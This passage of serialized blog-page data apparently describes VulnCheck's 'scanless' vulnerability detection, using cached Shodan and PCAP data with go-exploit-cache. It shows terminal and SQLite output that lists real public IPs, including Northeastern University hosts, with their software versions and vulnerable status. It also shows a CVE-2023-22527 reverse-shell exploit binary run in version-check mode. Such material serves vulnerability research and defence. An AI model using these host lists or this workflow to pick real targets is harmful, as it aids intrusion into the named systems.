",[886,70069,70070],{},"verified",[1354,70072,70074],{"className":31740,"code":70073,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select * from verified;\n1|1721417205|Confluence|1|7.19.17|52.207.194.59|80\nsqlite>\n",[886,70075,70076,70084,70096,70112,70128,70159],{"__ignoreMap":219},[1373,70077,70078,70080,70082],{"class":1375,"line":1376},[1373,70079,69433],{"class":2206},[1373,70081,69543],{"class":1391},[1373,70083,69454],{"class":1391},[1373,70085,70086,70088,70090,70092,70094],{"class":1375,"line":220},[1373,70087,69550],{"class":2206},[1373,70089,45880],{"class":1391},[1373,70091,69555],{"class":5467},[1373,70093,69558],{"class":1391},[1373,70095,69561],{"class":1391},[1373,70097,70098,70100,70102,70104,70106,70108,70110],{"class":1375,"line":1266},[1373,70099,55798],{"class":2206},[1373,70101,4883],{"class":1387},[1373,70103,69570],{"class":1391},[1373,70105,183],{"class":1387},[1373,70107,55807],{"class":1391},[1373,70109,69577],{"class":1391},[1373,70111,69580],{"class":1391},[1373,70113,70114,70116,70118,70120,70122,70124,70126],{"class":1375,"line":1852},[1373,70115,69585],{"class":2206},[1373,70117,69588],{"class":4640},[1373,70119,49878],{"class":1391},[1373,70121,19113],{"class":6761},[1373,70123,67067],{"class":1391},[1373,70125,45796],{"class":1391},[1373,70127,4912],{"class":1383},[1373,70129,70130,70132,70134,70137,70139,70142,70144,70146,70148,70151,70153,70155,70157],{"class":1375,"line":4692},[1373,70131,467],{"class":2206},[1373,70133,17472],{"class":1397},[1373,70135,70136],{"class":2206},"1721417205",[1373,70138,17472],{"class":1397},[1373,70140,70141],{"class":2206},"Confluence",[1373,70143,17472],{"class":1397},[1373,70145,467],{"class":2206},[1373,70147,17472],{"class":1397},[1373,70149,70150],{"class":2206},"7.19.17",[1373,70152,17472],{"class":1397},[1373,70154,69610],{"class":2206},[1373,70156,17472],{"class":1397},[1373,70158,69615],{"class":2206},[1373,70160,70161,70163],{"class":1375,"line":4724},[1373,70162,69585],{"class":2206},[1373,70164,6765],{"class":4640},[61,70166,70168],{"id":70167},"go-scanless-across-multiple-hosts","Go Scanless Across Multiple Hosts",[18,70170,70171,70172,70174,70175,70178,70179,70181],{},"But that’s just one target out of a couple thousand entries in the database. To scan all of the database, you can just loop over all rows in the ",[886,70173,69530],{}," table. VulnCheck has an inhouse tool called ",[886,70176,70177],{},"db-scanner"," that does this. Below we use ",[886,70180,38930],{}," to demonstrate how quickly a scanless version scan can analyze all the hosts.",[1354,70183,70185],{"className":31740,"code":70184,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ time sudo .\u002Fbuild\u002Fdb-scanner -db ~\u002Fgo-exploit-cache\u002Fconfluence.db -scanners ~\u002Fcve-2023-22527\u002Freverseshell\u002Fbuild\u002F -logfile conflue\nnce.log\n\nreal 0m8.335s\nuser 0m3.154s\nsys 0m3.123s\n",[886,70186,70187,70217,70222,70226,70234,70241],{"__ignoreMap":219},[1373,70188,70189,70192,70195,70197,70200,70202,70205,70208,70211,70214],{"class":1375,"line":1376},[1373,70190,70191],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$",[1373,70193,70194],{"class":1391}," time",[1373,70196,17747],{"class":1391},[1373,70198,70199],{"class":1391}," .\u002Fbuild\u002Fdb-scanner",[1373,70201,69798],{"class":2209},[1373,70203,70204],{"class":1391}," ~\u002Fgo-exploit-cache\u002Fconfluence.db",[1373,70206,70207],{"class":2209}," -scanners",[1373,70209,70210],{"class":1391}," ~\u002Fcve-2023-22527\u002Freverseshell\u002Fbuild\u002F",[1373,70212,70213],{"class":2209}," -logfile",[1373,70215,70216],{"class":1391}," conflue\n",[1373,70218,70219],{"class":1375,"line":220},[1373,70220,70221],{"class":2206},"nce.log\n",[1373,70223,70224],{"class":1375,"line":1266},[1373,70225,6520],{"emptyLinePlaceholder":237},[1373,70227,70228,70231],{"class":1375,"line":1852},[1373,70229,70230],{"class":2206},"real",[1373,70232,70233],{"class":1391}," 0m8.335s\n",[1373,70235,70236,70238],{"class":1375,"line":4692},[1373,70237,39933],{"class":2206},[1373,70239,70240],{"class":1391}," 0m3.154s\n",[1373,70242,70243,70246],{"class":1375,"line":4724},[1373,70244,70245],{"class":2206},"sys",[1373,70247,70248],{"class":1391}," 0m3.123s\n",[18,70250,70251],{},"After 8 seconds, we have results for all entries in the database \u002F Shodan query. We can quickly grep the log file for results.",[1354,70253,70255],{"className":31740,"code":70254,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ cat confluence.log | grep \"vulnerable=yes\" | wc -l\n56\nalbinolobster@mournland:~\u002Finitial-access\u002Ftools\u002Fdb-scanner$ cat confluence.log | grep \"vulnerable=no\" | wc -l\n2114\n",[886,70256,70257,70287,70292,70317],{"__ignoreMap":219},[1373,70258,70259,70261,70264,70267,70269,70272,70274,70277,70279,70281,70284],{"class":1375,"line":1376},[1373,70260,70191],{"class":2206},[1373,70262,70263],{"class":1391}," cat",[1373,70265,70266],{"class":1391}," confluence.log",[1373,70268,2233],{"class":1397},[1373,70270,70271],{"class":2206}," grep",[1373,70273,4883],{"class":1387},[1373,70275,70276],{"class":1391},"vulnerable=yes",[1373,70278,183],{"class":1387},[1373,70280,2233],{"class":1397},[1373,70282,70283],{"class":2206}," wc",[1373,70285,70286],{"class":2209}," -l\n",[1373,70288,70289],{"class":1375,"line":220},[1373,70290,70291],{"class":2206},"56\n",[1373,70293,70294,70296,70298,70300,70302,70304,70306,70309,70311,70313,70315],{"class":1375,"line":1266},[1373,70295,70191],{"class":2206},[1373,70297,70263],{"class":1391},[1373,70299,70266],{"class":1391},[1373,70301,2233],{"class":1397},[1373,70303,70271],{"class":2206},[1373,70305,4883],{"class":1387},[1373,70307,70308],{"class":1391},"vulnerable=no",[1373,70310,183],{"class":1387},[1373,70312,2233],{"class":1397},[1373,70314,70283],{"class":2206},[1373,70316,70286],{"class":2209},[1373,70318,70319],{"class":1375,"line":1852},[1373,70320,70321],{"class":2206},"2114\n",[18,70323,70324],{},"And, of course, the database also stores all the details.",[1354,70326,70328],{"className":31740,"code":70327,"language":2186,"meta":219,"style":219},"sqlite> select * from verified limit 10;\n1|1721417427|Confluence|1|7.19.17|52.200.210.54|80\n2|1721417427|Confluence|1|7.19.16|135.181.36.116|443\n3|1721417427|Confluence|1|7.19.17|52.207.194.59|80\n4|1721417427|Confluence|1|8.5.3|122.152.230.161|8090\n5|1721417427|Confluence|1|8.9.1|31.148.148.9|443\n6|1721417427|Confluence|1|8.9.1|65.203.128.117|8443\n7|1721417427|Confluence|1|7.19.18|85.184.249.239|443\n8|1721417427|Confluence|1|8.9.3|129.241.14.197|443\n9|1721417427|Confluence|1|8.5.5|158.160.120.182|443\n10|1721417427|Confluence|1|7.19.19|52.34.139.174|443\n",[886,70329,70330,70350,70379,70408,70436,70465,70494,70522,70551,70580,70609],{"__ignoreMap":219},[1373,70331,70332,70334,70336,70338,70340,70342,70344,70346,70348],{"class":1375,"line":1376},[1373,70333,69585],{"class":2206},[1373,70335,69588],{"class":4640},[1373,70337,49878],{"class":1391},[1373,70339,19113],{"class":6761},[1373,70341,67067],{"class":1391},[1373,70343,45796],{"class":1391},[1373,70345,69601],{"class":1391},[1373,70347,39673],{"class":5467},[1373,70349,4912],{"class":1383},[1373,70351,70352,70354,70356,70359,70361,70363,70365,70367,70369,70371,70373,70375,70377],{"class":1375,"line":220},[1373,70353,467],{"class":2206},[1373,70355,17472],{"class":1397},[1373,70357,70358],{"class":2206},"1721417427",[1373,70360,17472],{"class":1397},[1373,70362,70141],{"class":2206},[1373,70364,17472],{"class":1397},[1373,70366,467],{"class":2206},[1373,70368,17472],{"class":1397},[1373,70370,70150],{"class":2206},[1373,70372,17472],{"class":1397},[1373,70374,69620],{"class":2206},[1373,70376,17472],{"class":1397},[1373,70378,69615],{"class":2206},[1373,70380,70381,70383,70385,70387,70389,70391,70393,70395,70397,70400,70402,70404,70406],{"class":1375,"line":1266},[1373,70382,353],{"class":2206},[1373,70384,17472],{"class":1397},[1373,70386,70358],{"class":2206},[1373,70388,17472],{"class":1397},[1373,70390,70141],{"class":2206},[1373,70392,17472],{"class":1397},[1373,70394,467],{"class":2206},[1373,70396,17472],{"class":1397},[1373,70398,70399],{"class":2206},"7.19.16",[1373,70401,17472],{"class":1397},[1373,70403,69629],{"class":2206},[1373,70405,17472],{"class":1397},[1373,70407,69634],{"class":2206},[1373,70409,70410,70412,70414,70416,70418,70420,70422,70424,70426,70428,70430,70432,70434],{"class":1375,"line":1852},[1373,70411,491],{"class":2206},[1373,70413,17472],{"class":1397},[1373,70415,70358],{"class":2206},[1373,70417,17472],{"class":1397},[1373,70419,70141],{"class":2206},[1373,70421,17472],{"class":1397},[1373,70423,467],{"class":2206},[1373,70425,17472],{"class":1397},[1373,70427,70150],{"class":2206},[1373,70429,17472],{"class":1397},[1373,70431,69610],{"class":2206},[1373,70433,17472],{"class":1397},[1373,70435,69615],{"class":2206},[1373,70437,70438,70440,70442,70444,70446,70448,70450,70452,70454,70457,70459,70461,70463],{"class":1375,"line":4692},[1373,70439,380],{"class":2206},[1373,70441,17472],{"class":1397},[1373,70443,70358],{"class":2206},[1373,70445,17472],{"class":1397},[1373,70447,70141],{"class":2206},[1373,70449,17472],{"class":1397},[1373,70451,467],{"class":2206},[1373,70453,17472],{"class":1397},[1373,70455,70456],{"class":2206},"8.5.3",[1373,70458,17472],{"class":1397},[1373,70460,69639],{"class":2206},[1373,70462,17472],{"class":1397},[1373,70464,69644],{"class":2206},[1373,70466,70467,70469,70471,70473,70475,70477,70479,70481,70483,70486,70488,70490,70492],{"class":1375,"line":4724},[1373,70468,401],{"class":2206},[1373,70470,17472],{"class":1397},[1373,70472,70358],{"class":2206},[1373,70474,17472],{"class":1397},[1373,70476,70141],{"class":2206},[1373,70478,17472],{"class":1397},[1373,70480,467],{"class":2206},[1373,70482,17472],{"class":1397},[1373,70484,70485],{"class":2206},"8.9.1",[1373,70487,17472],{"class":1397},[1373,70489,69649],{"class":2206},[1373,70491,17472],{"class":1397},[1373,70493,69634],{"class":2206},[1373,70495,70496,70498,70500,70502,70504,70506,70508,70510,70512,70514,70516,70518,70520],{"class":1375,"line":4756},[1373,70497,356],{"class":2206},[1373,70499,17472],{"class":1397},[1373,70501,70358],{"class":2206},[1373,70503,17472],{"class":1397},[1373,70505,70141],{"class":2206},[1373,70507,17472],{"class":1397},[1373,70509,467],{"class":2206},[1373,70511,17472],{"class":1397},[1373,70513,70485],{"class":2206},[1373,70515,17472],{"class":1397},[1373,70517,69658],{"class":2206},[1373,70519,17472],{"class":1397},[1373,70521,69663],{"class":2206},[1373,70523,70524,70526,70528,70530,70532,70534,70536,70538,70540,70543,70545,70547,70549],{"class":1375,"line":4768},[1373,70525,423],{"class":2206},[1373,70527,17472],{"class":1397},[1373,70529,70358],{"class":2206},[1373,70531,17472],{"class":1397},[1373,70533,70141],{"class":2206},[1373,70535,17472],{"class":1397},[1373,70537,467],{"class":2206},[1373,70539,17472],{"class":1397},[1373,70541,70542],{"class":2206},"7.19.18",[1373,70544,17472],{"class":1397},[1373,70546,69668],{"class":2206},[1373,70548,17472],{"class":1397},[1373,70550,69634],{"class":2206},[1373,70552,70553,70555,70557,70559,70561,70563,70565,70567,70569,70572,70574,70576,70578],{"class":1375,"line":4792},[1373,70554,37681],{"class":2206},[1373,70556,17472],{"class":1397},[1373,70558,70358],{"class":2206},[1373,70560,17472],{"class":1397},[1373,70562,70141],{"class":2206},[1373,70564,17472],{"class":1397},[1373,70566,467],{"class":2206},[1373,70568,17472],{"class":1397},[1373,70570,70571],{"class":2206},"8.9.3",[1373,70573,17472],{"class":1397},[1373,70575,69677],{"class":2206},[1373,70577,17472],{"class":1397},[1373,70579,69634],{"class":2206},[1373,70581,70582,70584,70586,70588,70590,70592,70594,70596,70598,70601,70603,70605,70607],{"class":1375,"line":4798},[1373,70583,723],{"class":2206},[1373,70585,17472],{"class":1397},[1373,70587,70358],{"class":2206},[1373,70589,17472],{"class":1397},[1373,70591,70141],{"class":2206},[1373,70593,17472],{"class":1397},[1373,70595,467],{"class":2206},[1373,70597,17472],{"class":1397},[1373,70599,70600],{"class":2206},"8.5.5",[1373,70602,17472],{"class":1397},[1373,70604,69686],{"class":2206},[1373,70606,17472],{"class":1397},[1373,70608,69634],{"class":2206},[1373,70610,70611,70613,70615,70617,70619,70621,70623,70625,70627,70630,70632,70634,70636],{"class":1375,"line":4806},[1373,70612,24698],{"class":2206},[1373,70614,17472],{"class":1397},[1373,70616,70358],{"class":2206},[1373,70618,17472],{"class":1397},[1373,70620,70141],{"class":2206},[1373,70622,17472],{"class":1397},[1373,70624,467],{"class":2206},[1373,70626,17472],{"class":1397},[1373,70628,70629],{"class":2206},"7.19.19",[1373,70631,17472],{"class":1397},[1373,70633,69695],{"class":2206},[1373,70635,17472],{"class":1397},[1373,70637,69634],{"class":2206},[18,70639,70640],{},"So when a new emergent Confluence vulnerability comes out (like it does every quarter), we will be able to say who \u002F how many are vulnerable within seconds. Very useful!",[61,70642,70644],{"id":70643},"a-real-world-example-of-going-scanless-w-go-exploit","A Real World Example of Going Scanless w\u002F go-exploit",[18,70646,70647],{},"We don’t have to limit ourselves to just one CVE or product though. Consider the following query that covers Northeastern University.",[18,70649,70650,70654],{},[68,70651],{":width":10862,"alt":70652,"src":70653},"Northeastern on Shodan","\u002Fblog\u002Fvulncheck-goes-scanless\u002Fshodan-northeastern.png",[68,70655],{":width":10862,"alt":70652,"src":69391},[18,70657,70658,70659,70662],{},"Northeastern has thousands of hosts\u002Fassets on their networks, but it's difficult to say what exactly they are from this view. By converting this query into a go-exploit cache database and pushing them through the scanners VulnCheck from our ",[47,70660,1245],{"href":45535,"rel":70661},[51]," offering, we are able to passively identify hundreds of assets, their versions, and what they are vulnerable to (including at least one unauthenticated remote code execution issue). Here is a small sample from the resulting verified table:",[1354,70664,70666],{"className":31740,"code":70665,"language":2186,"meta":219,"style":219},"sqlite> select * from verified where installed = 1 order by id desc limit 10;\n264875|1721415612|XWiki|1|13.10.8|155.33.23.90|443\n230005|1721413745|ASUS|1||129.10.132.218|8443\n223128|1721413373|Tinyproxy|1|1.8.2|155.33.213.146|8080\n223057|1721413370|Tinyproxy|1|1.8.2|129.10.14.218|8080\n221645|1721413311|Tinyproxy|1|1.8.2|129.10.73.222|8080\n221337|1721413298|ownCloud|1||129.10.115.142|443\n153259|1721410531|PaperCut NG\u002FMF|1|66961|155.33.36.94|443\n109011|1721409204|Confluence|1|8.5.12|129.10.117.205|443\n66874|1721408317|Grafana|1||129.10.134.74|3000\n64903|1721408289|Apache HTTP Server|1|2.4.59|129.10.111.148|80\n",[886,70667,70668,70709,70741,70769,70803,70834,70865,70893,70929,70961,70990],{"__ignoreMap":219},[1373,70669,70670,70672,70674,70676,70678,70680,70682,70685,70688,70690,70692,70695,70698,70700,70703,70705,70707],{"class":1375,"line":1376},[1373,70671,69585],{"class":2206},[1373,70673,69588],{"class":4640},[1373,70675,49878],{"class":1391},[1373,70677,19113],{"class":6761},[1373,70679,67067],{"class":1391},[1373,70681,45796],{"class":1391},[1373,70683,70684],{"class":1391}," where",[1373,70686,70687],{"class":1391}," installed",[1373,70689,8575],{"class":1391},[1373,70691,5468],{"class":5467},[1373,70693,70694],{"class":1391}," order",[1373,70696,70697],{"class":1391}," by",[1373,70699,7911],{"class":1391},[1373,70701,70702],{"class":1391}," desc",[1373,70704,69601],{"class":1391},[1373,70706,39673],{"class":5467},[1373,70708,4912],{"class":1383},[1373,70710,70711,70714,70716,70719,70721,70723,70725,70727,70729,70732,70734,70737,70739],{"class":1375,"line":220},[1373,70712,70713],{"class":2206},"264875",[1373,70715,17472],{"class":1397},[1373,70717,70718],{"class":2206},"1721415612",[1373,70720,17472],{"class":1397},[1373,70722,31635],{"class":2206},[1373,70724,17472],{"class":1397},[1373,70726,467],{"class":2206},[1373,70728,17472],{"class":1397},[1373,70730,70731],{"class":2206},"13.10.8",[1373,70733,17472],{"class":1397},[1373,70735,70736],{"class":2206},"155.33.23.90",[1373,70738,17472],{"class":1397},[1373,70740,69634],{"class":2206},[1373,70742,70743,70746,70748,70751,70753,70756,70758,70760,70762,70765,70767],{"class":1375,"line":1266},[1373,70744,70745],{"class":2206},"230005",[1373,70747,17472],{"class":1397},[1373,70749,70750],{"class":2206},"1721413745",[1373,70752,17472],{"class":1397},[1373,70754,70755],{"class":2206},"ASUS",[1373,70757,17472],{"class":1397},[1373,70759,467],{"class":2206},[1373,70761,55462],{"class":1397},[1373,70763,70764],{"class":2206},"129.10.132.218",[1373,70766,17472],{"class":1397},[1373,70768,69663],{"class":2206},[1373,70770,70771,70774,70776,70779,70781,70784,70786,70788,70790,70793,70795,70798,70800],{"class":1375,"line":1852},[1373,70772,70773],{"class":2206},"223128",[1373,70775,17472],{"class":1397},[1373,70777,70778],{"class":2206},"1721413373",[1373,70780,17472],{"class":1397},[1373,70782,70783],{"class":2206},"Tinyproxy",[1373,70785,17472],{"class":1397},[1373,70787,467],{"class":2206},[1373,70789,17472],{"class":1397},[1373,70791,70792],{"class":2206},"1.8.2",[1373,70794,17472],{"class":1397},[1373,70796,70797],{"class":2206},"155.33.213.146",[1373,70799,17472],{"class":1397},[1373,70801,70802],{"class":2206},"8080\n",[1373,70804,70805,70808,70810,70813,70815,70817,70819,70821,70823,70825,70827,70830,70832],{"class":1375,"line":4692},[1373,70806,70807],{"class":2206},"223057",[1373,70809,17472],{"class":1397},[1373,70811,70812],{"class":2206},"1721413370",[1373,70814,17472],{"class":1397},[1373,70816,70783],{"class":2206},[1373,70818,17472],{"class":1397},[1373,70820,467],{"class":2206},[1373,70822,17472],{"class":1397},[1373,70824,70792],{"class":2206},[1373,70826,17472],{"class":1397},[1373,70828,70829],{"class":2206},"129.10.14.218",[1373,70831,17472],{"class":1397},[1373,70833,70802],{"class":2206},[1373,70835,70836,70839,70841,70844,70846,70848,70850,70852,70854,70856,70858,70861,70863],{"class":1375,"line":4724},[1373,70837,70838],{"class":2206},"221645",[1373,70840,17472],{"class":1397},[1373,70842,70843],{"class":2206},"1721413311",[1373,70845,17472],{"class":1397},[1373,70847,70783],{"class":2206},[1373,70849,17472],{"class":1397},[1373,70851,467],{"class":2206},[1373,70853,17472],{"class":1397},[1373,70855,70792],{"class":2206},[1373,70857,17472],{"class":1397},[1373,70859,70860],{"class":2206},"129.10.73.222",[1373,70862,17472],{"class":1397},[1373,70864,70802],{"class":2206},[1373,70866,70867,70870,70872,70875,70877,70880,70882,70884,70886,70889,70891],{"class":1375,"line":4756},[1373,70868,70869],{"class":2206},"221337",[1373,70871,17472],{"class":1397},[1373,70873,70874],{"class":2206},"1721413298",[1373,70876,17472],{"class":1397},[1373,70878,70879],{"class":2206},"ownCloud",[1373,70881,17472],{"class":1397},[1373,70883,467],{"class":2206},[1373,70885,55462],{"class":1397},[1373,70887,70888],{"class":2206},"129.10.115.142",[1373,70890,17472],{"class":1397},[1373,70892,69634],{"class":2206},[1373,70894,70895,70898,70900,70903,70905,70908,70911,70913,70915,70917,70920,70922,70925,70927],{"class":1375,"line":4768},[1373,70896,70897],{"class":2206},"153259",[1373,70899,17472],{"class":1397},[1373,70901,70902],{"class":2206},"1721410531",[1373,70904,17472],{"class":1397},[1373,70906,70907],{"class":2206},"PaperCut",[1373,70909,70910],{"class":1391}," NG\u002FMF",[1373,70912,17472],{"class":1397},[1373,70914,467],{"class":2206},[1373,70916,17472],{"class":1397},[1373,70918,70919],{"class":2206},"66961",[1373,70921,17472],{"class":1397},[1373,70923,70924],{"class":2206},"155.33.36.94",[1373,70926,17472],{"class":1397},[1373,70928,69634],{"class":2206},[1373,70930,70931,70934,70936,70939,70941,70943,70945,70947,70949,70952,70954,70957,70959],{"class":1375,"line":4792},[1373,70932,70933],{"class":2206},"109011",[1373,70935,17472],{"class":1397},[1373,70937,70938],{"class":2206},"1721409204",[1373,70940,17472],{"class":1397},[1373,70942,70141],{"class":2206},[1373,70944,17472],{"class":1397},[1373,70946,467],{"class":2206},[1373,70948,17472],{"class":1397},[1373,70950,70951],{"class":2206},"8.5.12",[1373,70953,17472],{"class":1397},[1373,70955,70956],{"class":2206},"129.10.117.205",[1373,70958,17472],{"class":1397},[1373,70960,69634],{"class":2206},[1373,70962,70963,70966,70968,70971,70973,70976,70978,70980,70982,70985,70987],{"class":1375,"line":4798},[1373,70964,70965],{"class":2206},"66874",[1373,70967,17472],{"class":1397},[1373,70969,70970],{"class":2206},"1721408317",[1373,70972,17472],{"class":1397},[1373,70974,70975],{"class":2206},"Grafana",[1373,70977,17472],{"class":1397},[1373,70979,467],{"class":2206},[1373,70981,55462],{"class":1397},[1373,70983,70984],{"class":2206},"129.10.134.74",[1373,70986,17472],{"class":1397},[1373,70988,70989],{"class":2206},"3000\n",[1373,70991,70992,70995,70997,71000,71002,71004,71007,71010,71012,71014,71016,71019,71021,71024,71026],{"class":1375,"line":4806},[1373,70993,70994],{"class":2206},"64903",[1373,70996,17472],{"class":1397},[1373,70998,70999],{"class":2206},"1721408289",[1373,71001,17472],{"class":1397},[1373,71003,3149],{"class":2206},[1373,71005,71006],{"class":1391}," HTTP",[1373,71008,71009],{"class":1391}," Server",[1373,71011,17472],{"class":1397},[1373,71013,467],{"class":2206},[1373,71015,17472],{"class":1397},[1373,71017,71018],{"class":2206},"2.4.59",[1373,71020,17472],{"class":1397},[1373,71022,71023],{"class":2206},"129.10.111.148",[1373,71025,17472],{"class":1397},[1373,71027,69615],{"class":2206},[18,71029,71030],{},"go-exploit-cache also supports converting a PCAP into a cache database. We deliver PCAPs with our exploits to all Initial Access customers, so they are also able to test the scanners asset detection and version scanning logic without configuring a target themselves. Once again, we provided a Confluence sample in the go-exploit-cache repository. You can test it like so:",[1354,71032,71034],{"className":31740,"code":71033,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ .\u002Fbuild\u002Fgo-exploit-cache -type pcap -in .\u002Ftest\u002Ftestdata\u002Fconfluence-exploit.pcapng -out confluence.db\n2024\u002F07\u002F23 10:45:21 Locating all HTTP requests...\n2024\u002F07\u002F23 10:45:21 Locating all HTTP responses...\n2024\u002F07\u002F23 10:45:21 Generating database entries...\n",[886,71035,71036,71056,71074,71089],{"__ignoreMap":219},[1373,71037,71038,71040,71042,71044,71047,71049,71052,71054],{"class":1375,"line":1376},[1373,71039,69433],{"class":2206},[1373,71041,69436],{"class":1391},[1373,71043,69439],{"class":2209},[1373,71045,71046],{"class":1391}," pcap",[1373,71048,69445],{"class":2209},[1373,71050,71051],{"class":1391}," .\u002Ftest\u002Ftestdata\u002Fconfluence-exploit.pcapng",[1373,71053,69451],{"class":2209},[1373,71055,69454],{"class":1391},[1373,71057,71058,71061,71064,71067,71069,71071],{"class":1375,"line":220},[1373,71059,71060],{"class":2206},"2024\u002F07\u002F23",[1373,71062,71063],{"class":1391}," 10:45:21",[1373,71065,71066],{"class":1391}," Locating",[1373,71068,57374],{"class":1391},[1373,71070,71006],{"class":1391},[1373,71072,71073],{"class":1391}," requests...\n",[1373,71075,71076,71078,71080,71082,71084,71086],{"class":1375,"line":1266},[1373,71077,71060],{"class":2206},[1373,71079,71063],{"class":1391},[1373,71081,71066],{"class":1391},[1373,71083,57374],{"class":1391},[1373,71085,71006],{"class":1391},[1373,71087,71088],{"class":1391}," responses...\n",[1373,71090,71091,71093,71095,71097,71099],{"class":1375,"line":1852},[1373,71092,71060],{"class":2206},[1373,71094,71063],{"class":1391},[1373,71096,69513],{"class":1391},[1373,71098,69516],{"class":1391},[1373,71100,69519],{"class":1391},[18,71102,71103],{},"The resulting database contains two cached queries:",[1354,71105,71107],{"className":31740,"code":71106,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select rhost,rport,uri from http_cache;\n10.9.49.88|8090|\u002F\n10.9.49.88|8090|\u002Flogin.action?os_destination=%2Findex.action&permissionViolation=true\n",[886,71108,71109,71117,71129,71145,71162,71177],{"__ignoreMap":219},[1373,71110,71111,71113,71115],{"class":1375,"line":1376},[1373,71112,69433],{"class":2206},[1373,71114,69543],{"class":1391},[1373,71116,69454],{"class":1391},[1373,71118,71119,71121,71123,71125,71127],{"class":1375,"line":220},[1373,71120,69550],{"class":2206},[1373,71122,45880],{"class":1391},[1373,71124,69555],{"class":5467},[1373,71126,69558],{"class":1391},[1373,71128,69561],{"class":1391},[1373,71130,71131,71133,71135,71137,71139,71141,71143],{"class":1375,"line":1266},[1373,71132,55798],{"class":2206},[1373,71134,4883],{"class":1387},[1373,71136,69570],{"class":1391},[1373,71138,183],{"class":1387},[1373,71140,55807],{"class":1391},[1373,71142,69577],{"class":1391},[1373,71144,69580],{"class":1391},[1373,71146,71147,71149,71151,71153,71156,71158,71160],{"class":1375,"line":1852},[1373,71148,69585],{"class":2206},[1373,71150,69588],{"class":4640},[1373,71152,49878],{"class":1391},[1373,71154,71155],{"class":1391}," rhost,rport,uri",[1373,71157,67067],{"class":1391},[1373,71159,69598],{"class":1391},[1373,71161,4912],{"class":1383},[1373,71163,71164,71167,71169,71172,71174],{"class":1375,"line":4692},[1373,71165,71166],{"class":2206},"10.9.49.88",[1373,71168,17472],{"class":1397},[1373,71170,71171],{"class":2206},"8090",[1373,71173,17472],{"class":1397},[1373,71175,71176],{"class":2206},"\u002F\n",[1373,71178,71179,71181,71183,71185,71187,71190,71193,71195,71198,71200],{"class":1375,"line":4724},[1373,71180,71166],{"class":2206},[1373,71182,17472],{"class":1397},[1373,71184,71171],{"class":2206},[1373,71186,17472],{"class":1397},[1373,71188,71189],{"class":2206},"\u002Flogin.action?os_destination",[1373,71191,71192],{"class":1391},"=%2Findex.action",[1373,71194,7218],{"class":1383},[1373,71196,71197],{"class":4640},"permissionViolation",[1373,71199,5417],{"class":1397},[1373,71201,45801],{"class":1391},[18,71203,71204],{},"And, of course, our Confluence exploits are able to use this pcap-generated database to do a scanless asset detection and version scan.",[1354,71206,71208],{"className":31740,"code":71207,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ .\u002Fbuild\u002Fcve-2023-22527_linux-arm64 -rhost 10.9.49.88 -rport 8090 -db ~\u002Fgo-exploit-cache\u002Fconfluence.db -v -c -fll TRACE\ntime=2024-07-23T10:47:41.284-04:00 level=DEBUG msg=\"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 Safari\u002F537.36\"\ntime=2024-07-23T10:47:41.287-04:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.88 port=8090 ssl=false \"ssl auto\"=false\ntime=2024-07-23T10:47:41.287-04:00 level=STATUS msg=\"Validating Confluence target\" host=10.9.49.88 port=8090\ntime=2024-07-23T10:47:41.288-04:00 level=TRACE msg=\"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F\"\ntime=2024-07-23T10:47:41.289-04:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.9.49.88 port=8090 verified=true\ntime=2024-07-23T10:47:41.289-04:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.9.49.88 port=8090\ntime=2024-07-23T10:47:41.289-04:00 level=TRACE msg=\"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F\"\ntime=2024-07-23T10:47:41.289-04:00 level=VERSION msg=\"The reported version is 8.5.3\" host=10.9.49.88 port=8090 version=8.5.3\ntime=2024-07-23T10:47:41.290-04:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.9.49.88 port=8090 vulnerable=yes\n",[886,71209,71210,71239,71264,71321,71357,71384,71427,71463,71487,71531],{"__ignoreMap":219},[1373,71211,71212,71214,71216,71218,71221,71223,71226,71228,71230,71232,71234,71236],{"class":1375,"line":1376},[1373,71213,69770],{"class":2206},[1373,71215,69781],{"class":1391},[1373,71217,38910],{"class":2209},[1373,71219,71220],{"class":5467}," 10.9.49.88",[1373,71222,45568],{"class":2209},[1373,71224,71225],{"class":5467}," 8090",[1373,71227,69798],{"class":2209},[1373,71229,70204],{"class":1391},[1373,71231,45584],{"class":2209},[1373,71233,45587],{"class":2209},[1373,71235,67171],{"class":2209},[1373,71237,71238],{"class":1391}," TRACE\n",[1373,71240,71241,71243,71245,71248,71250,71252,71254,71256,71258,71260,71262],{"class":1375,"line":220},[1373,71242,38930],{"class":4640},[1373,71244,5417],{"class":1397},[1373,71246,71247],{"class":1391},"2024-07-23T10:47:41.284-04:00",[1373,71249,38938],{"class":4640},[1373,71251,5417],{"class":1397},[1373,71253,67201],{"class":1391},[1373,71255,38946],{"class":4640},[1373,71257,5417],{"class":1397},[1373,71259,183],{"class":1387},[1373,71261,67210],{"class":1391},[1373,71263,19057],{"class":1387},[1373,71265,71266,71268,71270,71273,71275,71277,71279,71281,71283,71285,71287,71289,71291,71293,71295,71297,71299,71301,71303,71305,71307,71309,71311,71313,71315,71317,71319],{"class":1375,"line":1266},[1373,71267,38930],{"class":4640},[1373,71269,5417],{"class":1397},[1373,71271,71272],{"class":1391},"2024-07-23T10:47:41.287-04:00",[1373,71274,38938],{"class":4640},[1373,71276,5417],{"class":1397},[1373,71278,38943],{"class":1391},[1373,71280,38946],{"class":4640},[1373,71282,5417],{"class":1397},[1373,71284,183],{"class":1387},[13